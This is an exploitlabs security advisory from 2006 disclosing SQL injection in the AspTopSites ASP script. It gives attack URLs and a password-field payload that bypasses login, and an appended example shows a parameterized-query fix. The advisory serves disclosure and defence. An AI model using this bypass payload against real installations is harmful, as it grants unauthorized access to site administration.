------------------------------------------------------------
- EXPL-A-2006-001 exploitlabs.com Advisory 047 -
------------------------------------------------------------
- AspTopSites -

AFFECTED PRODUCTS
=================
AspTopSites
http://www.maine-net.com/aspts.asp

OVERVIEW
========
AspTopSites® runs on your Windows NT/2K/2003 Server and uses
Active Server Pages with a MS Access 2000 database. Simply upload
AspTopSites®, make one configuration setting and you're ready to
start running your own TopSites traffic generator. AspTopSites®
comes with full source code... no encoding or DLLs need to be
installed on the server.

DETAILS
=======
1. SQL Injection

AspTopSites does not filter SQL in user input, resulting in full
access to the user manager menu.

POC
===
1. Entering a SQL injection type statement in the password field
causes the statement to be true.

http://[host]/topsites/default.asp           <--- view listings
http://[host]/topsites/goto.asp?id=43        <--- mouseover id value
http://[host]/topsites/includeloginuser.asp  <--- login here

user: [ id value ]
password: 'or'

note: Vendor demo site is vulnerable

SOLUTION:
=========
vendor contact:

Jan 3, 2006 wills@maine-net.com ( no resp )
Jan 10, 2006 ( no resp => release )

Credits
=======
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs

Donnie Werner

mail: wood at exploitlabs.com
mail: morning_wood at zone-h.org
--
web: http://exploitlabs.com
web: http://zone-h.org

http://exploitlabs.com/files/advisories/EXPL-A-2006-001-asptopsites.txt
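
The class of fix for the login issue described under DETAILS, as an added example that is not part of the original advisory and not AspTopSites source code: a classic ASP login check that binds the id and password as ADO parameters instead of building the SQL text from form input. The table name "Sites", the columns "SiteID" and "SitePassword", the function name CheckLogin and the 64-character limit are assumptions made for illustration.

```vbscript
<%
' Added example. Hypothetical schema: table Sites(SiteID, SitePassword).
' These names are assumptions, not taken from the AspTopSites source.
Const adCmdText    = 1
Const adInteger    = 3
Const adVarWChar   = 202
Const adParamInput = 1

' Pattern that leads to the reported behaviour: form input is pasted into the
' SQL text, so a quote in the password field closes the string literal and the
' remainder of the input is parsed as SQL.
'   sql = "SELECT SiteID FROM Sites WHERE SiteID = " & Request.Form("user") & _
'         " AND SitePassword = '" & Request.Form("password") & "'"

' Hardened form: input is validated, then bound as parameters, so quotes in the
' password are compared as data and never reach the SQL parser as syntax.
' conn is an open ADODB.Connection supplied by the caller.
Function CheckLogin(conn, ByVal rawId, ByVal rawPassword)
    Dim re, cmd, rs, idText, pwText
    CheckLogin = False

    idText = Trim(CStr(rawId))
    pwText = CStr(rawPassword)

    ' The id shown in goto.asp?id=... is an integer; reject anything else.
    Set re = New RegExp
    re.Pattern = "^\d{1,9}$"
    If Not re.Test(idText) Then Exit Function
    If Len(pwText) = 0 Or Len(pwText) > 64 Then Exit Function

    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = "SELECT SiteID FROM Sites WHERE SiteID = ? AND SitePassword = ?"
    cmd.Parameters.Append cmd.CreateParameter("id", adInteger, adParamInput, , CLng(idText))
    cmd.Parameters.Append cmd.CreateParameter("pw", adVarWChar, adParamInput, 64, pwText)

    Set rs = cmd.Execute
    CheckLogin = Not rs.EOF   ' a row exists only when both values match exactly
    rs.Close
    Set rs = Nothing
    Set cmd = Nothing
End Function
%>
```

A caller would use it as `If CheckLogin(conn, Request.Form("user"), Request.Form("password")) Then ...`, where the form field names are likewise assumed.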